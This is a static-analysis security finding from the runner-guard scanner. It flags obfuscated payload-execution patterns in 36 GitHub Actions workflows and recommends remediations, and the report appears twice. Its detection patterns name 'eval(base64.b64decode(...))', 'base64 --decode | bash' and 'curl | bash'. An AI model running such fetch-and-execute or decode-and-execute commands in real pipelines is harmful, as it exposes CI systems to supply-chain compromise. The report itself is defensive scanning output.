Runner-Guard Security Finding
Rule: RGS-018 — Suspicious Payload Execution Pattern
Severity: High
Occurrences: 38 findings across 36 unique workflows
Description
Workflow run: blocks contain code patterns associated with obfuscated payload execution or known indicators of compromise (IOCs) from active supply chain attack campaigns. This includes:
eval + decode chains (e.g., eval(base64.b64decode(...)), base64 --decode | bash)- Known malware marker variables
- Persistence file paths
- C2 (command and control) communication patterns
These patterns are loaded from Runner Guard's threat signature database.
Impact
A match against a known IOC indicates active compromise. A match against a dangerous execution pattern indicates susceptibility to this class of supply chain attack. These patterns allow attackers to execute arbitrary code that evades basic code review by obfuscating the payload in encoded form.
Affected Workflows (36 unique)
copilot-token-optimizer, daily-news, issue-arborist, org-health-report, deep-report, cli-version-checker, copilot-token-audit, daily-sentrux-report, smoke-opencode, stale-repo-identifier, copilot-pr-merged-report, audit-workflows, changeset, cloclo, copilot-opt, copilot-pr-nlp-analysis, daily-safe-output-optimizer, daily-issues-report, and 18 additional workflows.
Remediation
-
Audit all curl | bash patterns — Replace with pinned, verified actions or scripts with integrity checks:
# Instead of:
run: curl (example.com/redacted) | bash
# Use a pinned action with known SHA:
uses: owner/action@<full-sha>
-
Replace base64-encoded execution — Avoid eval+decode patterns; use plain readable scripts or reference scripts from the repository directly.
-
Review flagged workflows immediately — If any RGS-018 match is against a known IOC rather than a dangerous pattern, treat it as an active security incident.
-
Use RUNNER_TEMP for scripts — Fetch scripts to a temp location, verify their integrity, then execute:
curl -fsSL (example.com/redacted) -o "${RUNNER_TEMP}/script.sh"
sha256sum -c expected.sha256 # verify before running
bash "${RUNNER_TEMP}/script.sh"
Detected by runner-guard v2.6.0 — CI/CD source-to-sink vulnerability scanner
Workflow run: https://github.com/github/gh-aw/actions/runs/25206730082
Generated by Static Analysis Report · ● 332.6K · ◷
Runner-Guard Security Finding
Rule: RGS-018 — Suspicious Payload Execution Pattern
Severity: High
Occurrences: 38 findings across 36 unique workflows
Description
Workflow
run:blocks contain code patterns associated with obfuscated payload execution or known indicators of compromise (IOCs) from active supply chain attack campaigns. This includes:eval+ decode chains (e.g.,eval(base64.b64decode(...)),base64 --decode | bash)These patterns are loaded from Runner Guard's threat signature database.
Impact
A match against a known IOC indicates active compromise. A match against a dangerous execution pattern indicates susceptibility to this class of supply chain attack. These patterns allow attackers to execute arbitrary code that evades basic code review by obfuscating the payload in encoded form.
Affected Workflows (36 unique)
copilot-token-optimizer,daily-news,issue-arborist,org-health-report,deep-report,cli-version-checker,copilot-token-audit,daily-sentrux-report,smoke-opencode,stale-repo-identifier,copilot-pr-merged-report,audit-workflows,changeset,cloclo,copilot-opt,copilot-pr-nlp-analysis,daily-safe-output-optimizer,daily-issues-report, and 18 additional workflows.Remediation
Audit all
curl | bashpatterns — Replace with pinned, verified actions or scripts with integrity checks:Replace base64-encoded execution — Avoid eval+decode patterns; use plain readable scripts or reference scripts from the repository directly.
Review flagged workflows immediately — If any RGS-018 match is against a known IOC rather than a dangerous pattern, treat it as an active security incident.
Use
RUNNER_TEMPfor scripts — Fetch scripts to a temp location, verify their integrity, then execute:Detected by runner-guard v2.6.0 — CI/CD source-to-sink vulnerability scanner
Workflow run: https://github.com/github/gh-aw/actions/runs/25206730082